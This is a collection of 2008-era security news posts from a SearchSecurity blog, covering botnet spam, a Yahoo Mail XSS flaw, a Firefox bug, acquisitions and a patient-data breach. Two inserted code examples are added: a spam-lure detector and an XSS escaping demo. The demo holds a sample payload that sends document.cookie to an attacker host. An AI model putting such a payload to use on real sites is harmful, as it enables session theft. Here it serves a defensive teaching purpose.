Security Bytes - A SearchSecurity.com blog

The information security blog for the latest buzz on data security, privacy and regulatory compliance issues, information security threats, software security updates, flaws and more.

The changing face of information security

In the last eight years or so, I’ve probably been to more than 100 security conferences, workshops, trade shows and seminars, and I’m hard-pressed to come up with one that’s been more informative or entertaining than the Workshop on Economics in Information Security that’s taking place at Dartmouth College this week. As you might expect, the workshop is focused heavily on economic issues that influence information security and is light on technology talk. The thing that struck me most about the sessions today is the number of people who are doing serious work on this topic. Security has historically been one of the last refuges of the hard-core techie, but some of the brightest minds in the industry are now focusing their energies on thinking about the ways in which security, economics and other disciplines intersect. A quick look around the audience found Ross Anderson of the University of Cambridge, Bruce Schneier, Stuart Schechter of Harvard University and Phil Venables of Goldman Sachs.

I had the privilege this morning of speaking on a panel, with my friends Ryan Naraine and Scott Berinato, as well as Byron Acohido of USA Today and Brian Grow of BusinessWeek, about the media’s role in communicating security information to the public. The session produced a number of really interesting discussions. One attendee asked how difficult it is for journalists to get information about attacks and defenses from the government and enterprises who have been affected. The short answer is: virtually impossible. I’ve had some success with this over the years, as have the other panelists, but the truth is that the public at large, as well as security professionals, are being poorly served by the severe lack of objective data on attacks, breaches and cybercrime. (More on that later.)
Ross Anderson brought up another important topic, which many reporters struggle with on a daily basis: how to walk the line between responsible reporting of attacks and vulnerabilities, and pure fear-mongering. It’s not an easy task, I’ll say that, but if you go too far down the scare-tactic road, people tune out pretty quickly, and that’s counterproductive for everyone. The reality is that many of the things we write about and you deal with every day ARE scary, and people should be afraid of them. Some level of fear is healthy in this business, but we are all better off without the gratuitous bogeyman-in-the-server stories that serve no purpose other than to turn off smart readers.

Bruce Schneier also raised a good question regarding the value of stories about attack and defense tactics versus those about the reasons those attacks are successful and the societal and organizational failures that lead to them. A lot of the value depends on the audience. Byron and Brian both made the point that their audiences are less interested in the deep technical aspects of security than the SearchSecurity or ZDNet audiences are, which is an important point. But while the technical details will always have a place in the stories we write here, the psychological, organizational and economic aspects of why security succeeds or fails should have a seat at the table as well.

Srizbi botnet blamed for malicious spam surge

A sharp rise in the volume of malicious spam this month can be largely attributed to the Srizbi botnet, according to researchers at Marshal. Spam intended to infect users’ computers with malware tripled in one week, jumping from 3% of total spam at the beginning of June to 9.9% the following week.

The Srizbi botnet is currently spewing out spam that tries to trick users into clicking a link by putting the first part of the recipient’s email address in the subject line, along with the suggestion that they look stupid in a video, according to Marshal. It is also spoofing the Classmate.com service with emails that link to a fake Classmate.com page, which tells visitors to install a Flash video player. When users click that link, they are prompted to download an executable that infects their computers.
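The following is an added example, not code from Marshal or from the original post: a JavaScript (Node) heuristic that scores a message against the lure traits described above (the recipient’s local part echoed in the subject, the “you look stupid in this video” hook, a link that downloads an executable, and a page that tells the visitor to install a video player). The function names, the two-trait threshold and the sample messages are this example’s own assumptions.

```javascript
// Added example (not Marshal's code or the original post's): a message-level
// heuristic for the two Srizbi lures described above.
// Assumptions: messages are plain RFC 822 text (headers, blank line, body);
// the sample messages below are constructed for this example, not real captures.

// Local part of the first address in a header value, e.g. "alice.smith".
function localPart(headerValue) {
  const m = /([^<\s"]+)@/.exec(headerValue);
  return m ? m[1].toLowerCase() : null;
}

// Split raw text into a lower-cased header map and the body.
function parseMessage(raw) {
  const [head, ...rest] = raw.split(/\r?\n\r?\n/);
  const headers = {};
  for (const line of head.split(/\r?\n/)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).toLowerCase()] = line.slice(i + 1).trim();
  }
  return { headers, body: rest.join('\n\n') };
}

// Pull http(s) URLs out of the body.
function extractUrls(body) {
  return body.match(/https?:\/\/[^\s<>"']+/gi) || [];
}

// Returns the lure traits a message exhibits, in a fixed order, so a reviewer
// sees why it was flagged rather than a bare yes/no.
function lureTraits(raw) {
  const { headers, body } = parseMessage(raw);
  const subject = (headers.subject || '').toLowerCase();
  const text = subject + '\n' + body.toLowerCase();
  const urls = extractUrls(body);
  const me = localPart(headers.to || '');
  const traits = [];

  // Lure 1: the recipient's own local part is echoed in the subject line.
  if (me && me.length >= 3 && subject.includes(me)) traits.push('recipient-localpart-in-subject');
  // Lure 1: "you look stupid in this video".
  if (/\blook(s|ed)?\s+(stupid|ridiculous|silly)\b/.test(text) && /\bvideo\b/.test(text)) traits.push('embarrassing-video-lure');
  // Both lures end in a direct download of a Windows executable.
  if (urls.some((u) => /\.(exe|scr|pif|bat)(\?|$)/i.test(u))) traits.push('executable-download-link');
  // Lure 2: a fake social-network page asking the visitor to install a video player.
  if (/\b(flash|video)\s+player\b/.test(text) && urls.length > 0) traits.push('player-install-lure');

  return traits;
}

// Threshold is an assumption of this example: two independent traits.
function isSuspicious(raw) {
  return lureTraits(raw).length >= 2;
}

// Constructed samples; addresses and hosts use reserved documentation names.
const SAMPLES = [
  ['To: alice.smith@example.com', 'Subject: alice.smith, you look stupid in this video', '', 'Watch it here http://198.51.100.7/video.exe'].join('\n'),
  ['To: Bob <bob@example.net>', 'Subject: A friend posted a new video for you', '', 'To view it, install the Flash video player from http://videos.invalid/flashplayer.exe'].join('\n'),
  ['To: carol@example.org', 'Subject: Team meeting moved to 3pm', '', 'Agenda: https://intranet.example.org/agenda'].join('\n'),
];

for (const raw of SAMPLES) console.log(isSuspicious(raw), lureTraits(raw));
```

Run with `node` to see the first two samples flagged and the third passed; in practice a rule like this belongs in a mail gateway alongside attachment and URL reputation checks, since any single trait on its own will also match legitimate mail.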

Phil Hay, lead threat analyst with Marshal’s TRACE team, called the Srizbi botnet “one of the biggest threats to Internet users today.” Marshal said the botnet is responsible for 46% of all spam.

Yahoo Mail flaw found and fixed

Researchers at Cenzic discovered a vulnerability in Yahoo Mail that could allow attackers to steal Yahoo identities and potentially access users’ sensitive information.

The company, a Web application security provider based in Santa Clara, Calif., notified Yahoo of the cross-site scripting flaw in its popular Web mail program on May 23, and Yahoo fixed it on June 13.

The vulnerability requires the attacker to use Yahoo Messenger desktop application version 8.1.0.209 to chat with someone using the Messenger support in the latest version of Yahoo Mail. The attacker sets their chat status to “invisible” and sends a crafted message; when the attacker returns to the chat and the victim clicks on the message, the embedded script executes, said Mandeep Khera, Cenzic vice president of marketing.

The vulnerability could allow an attacker to access a Yahoo Mail user’s session ID and steal their Yahoo identity, which could expose sensitive information stored in their Yahoo account, according to Cenzic.
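As an added illustration (not Yahoo’s or Cenzic’s code, and not a reproduction of the specific flaw described above), the pair of renderers below shows the general bug class behind it: a chat pane that inserts message text into HTML unchanged, next to a hardened version that escapes everything and linkifies only vetted http(s) URLs. The function names and the sample payload are this example’s own assumptions.

```javascript
// Added example (not Yahoo's or Cenzic's code): how a web mail chat pane can be
// vulnerable to, and hardened against, stored XSS in a chat message.
// The message text below is constructed; the "vulnerable" renderer is shown
// only as the anti-pattern.

// ANTI-PATTERN: the message body is pasted into markup as-is, so a payload such
// as <img src=x onerror="..."> in the chat text runs in the mail origin.
function renderMessageVulnerable(sender, text) {
  return `<div class="msg"><b>${sender}</b>: ${text}</div>`;
}

// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Only http(s) URLs become links; javascript:, data: and unparseable strings
// stay as plain text.
function safeHref(url) {
  try {
    const u = new URL(url);
    return u.protocol === 'http:' || u.protocol === 'https:' ? u.href : null;
  } catch (e) {
    return null;
  }
}

// Hardened renderer: escape every token, then wrap only vetted URLs in <a>.
// The href is escaped too, so even a URL that parses cannot break out of the
// attribute.
function renderMessageSafe(sender, text) {
  const parts = String(text).split(/(\s+)/).map((tok) => {
    const href = /^https?:\/\//i.test(tok) ? safeHref(tok) : null;
    const esc = escapeHtml(tok);
    return href ? `<a href="${escapeHtml(href)}" rel="noopener noreferrer">${esc}</a>` : esc;
  });
  return `<div class="msg"><b>${escapeHtml(sender)}</b>: ${parts.join('')}</div>`;
}

// Constructed payload: tries to ship the victim's cookies to an attacker host.
const PAYLOAD = '<img src=x onerror="fetch(\'//evil.invalid/?c=\'+document.cookie)">';

console.log(renderMessageVulnerable('mallory', PAYLOAD)); // <img ...> survives
console.log(renderMessageSafe('mallory', PAYLOAD));       // &lt;img ...&gt; as text
console.log(renderMessageSafe('mallory', 'see http://example.com/ now'));
```

Escaping the message fixes the rendering path; separately, setting the session cookie with the HttpOnly flag keeps it out of `document.cookie`, which narrows what a script running in the mail origin can lift, although such a script can still act as the logged-in user.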

Cenzic researchers hadn’t heard of any actual attacks exploiting the vulnerability, but Khera said he wouldn’t be surprised if attackers had figured it out and were keeping it quiet. Attackers prefer to quietly exploit vulnerabilities for financial gain, he said.

 

Proofpoint acquires email archiving provider Fortiva

The steady drumbeat of acquisitions in the security industry continues, with the latest deal being Proofpoint’s purchase today of email archiving provider Fortiva. The deal is another indicator of the shift toward on-demand security technologies. Proofpoint already offers its email security product as a hosted service, and Fortiva has an on-demand archiving service as well. Although Proofpoint is probably best known for its email security appliances, which perform anti-spam, antivirus and DLP tasks, it already has a few on-demand offerings and has been moving further in that direction.

The companies did not disclose the financial terms of the deal. But, they did say that the development and support for Fortiva’s products will stay in Toronto, and that it will continue to be sold through the channel. Email archiving has become a hot topic of late as e-discovery has come to the fore, and the on-demand model has advantages for companies without the money or capacity to store all of their email on their own premises.

TippingPoint reports Firefox 3.0 flaw

TippingPoint said a researcher submitted a critical vulnerability affecting Firefox 3.0 to its Zero Day Initiative just five hours after Mozilla released the updated open source browser Tuesday.

In a blog post Wednesday, TippingPoint said its researchers verified the vulnerability in its lab and quickly reported the flaw to Mozilla’s security team. The flaw could allow an attacker to execute arbitrary code, but a user would first need to click on a link in an email or visit a malicious Web page, according to TippingPoint. The vulnerability also affects the earlier Firefox 2.0.x releases.

The company, a division of 3Com Corp., said it won’t release any other information about the vulnerability until a patch is available. Mozilla is working on a fix. TippingPoint’s Zero Day Initiative pays researchers for verified vulnerabilities.

Panda security researchers warn of new worm tool

Security researchers at antivirus vendor Panda Security have discovered an application that turns executable files into a worm that can spread and cause damage on infected machines.

The tool is so easy to use that researchers say very little technical knowledge is needed to pull off a successful attack. The worm can wreak havoc on an infected machine by disabling the Windows Task Manager, folder options and the system’s browser.

PandaLabs researcher Oscar Anduiza said the tool has a number of features that change the effectiveness and type of worm generated from the executable file. A hacker using the tool can also easily choose the date on which the worm activates.

“The worms can be configured to display a message when they are run or activate themselves when Windows is started,” Anduiza said in a PandaLabs blog post.

Third Brigade acquires OSSEC project

Third Brigade, a host intrusion prevention software company, has acquired OSSEC, an open source, host-based IDS. The vendor said the OSSEC project will remain open source while it provides commercial support and training. Daniel Cid, the creator and primary developer of OSSEC, will work as principal researcher at Third Brigade.

OSSEC began as an open source project in 2003 and, according to Third Brigade, has users in 40 countries, including two of the largest U.S. commercial banks. The HIDS software runs on multiple platforms, including Windows, Solaris, Linux and MacOS. Third Brigade plans to incorporate OSSEC functionality into future products.

The deal comes nearly a year after Sourcefire acquired ClamAV, another open source security project. Sourcefire owns the rights to the open source Snort IDS, which was created by Sourcefire founder Martin Roesch.

Microsoft security updates blocked by bug

UPDATE: Microsoft released a patch to apply to the System Center Configuration Manager 2007 servers to resolve the patching issues. Security Advisory 954474 has the details.

************
Microsoft continues to track a bug blocking the deployment of the June 2008 security updates. The software vendor said on Friday that an issue with System Center Configuration Manager 2007 “affects the deployment of security updates to Systems Management Server (SMS) 2003 clients.” Those on SMS 2003 using the Inventory Tool for Microsoft Updates aren’t getting the security updates.

Microsoft issued an advisory telling customers that its engineers were working to correct the issue.

“In response to this issue, we’ve activated our Software Security Incident Response Process (SSIRP) and our engineering teams are working to develop a solution for this issue,” said Christopher Budd, a security program manager in the Microsoft Security Response Center (MSRC).

Microsoft issued three critical updates in June as part of its monthly batch of updates, plugging holes in Bluetooth and Internet Explorer that could be exploited by a hacker to run malicious code and gain access to a machine.

Citrix executive named new Sourcefire chief

A former sales executive at virtualization vendor Citrix Systems Inc. will take over the helm at Sourcefire Inc.

Sourcefire said that John C. Burris will take over the CEO role of the company effective July 14. Burris was head of worldwide sales and services at Citrix. He replaces E. Wayne Jackson, who announced in February that he would step down from the top post. Jackson has remained on board until the company’s Board of Directors could choose a replacement.

Jackson oversaw an eventful 2007. The company went public in March 2007, after its planned acquisition by Check Point Software Technologies Inc. was abandoned in 2006 amid concerns about the Israeli-owned Check Point buying a U.S. security firm. Sourcefire also acquired the intellectual property of ClamAV, an open source antivirus project, in August.

“During my six years at Sourcefire, we have grown from a small security start-up to one of the most respected companies in our industry,” Jackson said in a statement.

The company also revamped its strategy last year, calling it Enterprise Threat Management. It still uses Snort, the open source intrusion detection engine, as the backbone of the strategy. The company said the goal was to combine intrusion prevention, network behavior analysis and network access control with vulnerability assessment.

Analysts have said that Sourcefire’s challenge has been to differentiate itself from much larger competitors such as Juniper Networks, Cisco Systems, ISS (now part of IBM Global Services) and TippingPoint Technologies (now a division within 3Com).

Billing records of 2.2 million stolen

The University of Utah Hospitals & Clinics said Tuesday that a metal box of backup tapes containing billing records for about 2.2 million patients and guarantors was stolen from a car belonging to a storage contractor’s employee.

The driver for Perpetual Storage violated the storage company’s policies for secure data transport, officials said. The theft, which occurred June 2, is under investigation by the Salt Lake County Sheriff’s Department, the FBI and the U.S. Postal Service. The University of Utah Hospitals & Clinics is offering a $1,000 reward for return of the tapes.

The billing records included patient names, demographic information and diagnostic codes. Records for a subset of 1.3 million patients also contained Social Security numbers.

Although officials said there is no evidence that the data on the tapes has been accessed, the health care system is notifying the affected individuals, providing them with credit monitoring, and taking additional steps to safeguard its records. It also suspended deliveries of backup tapes to Perpetual Storage pending a review of procedures.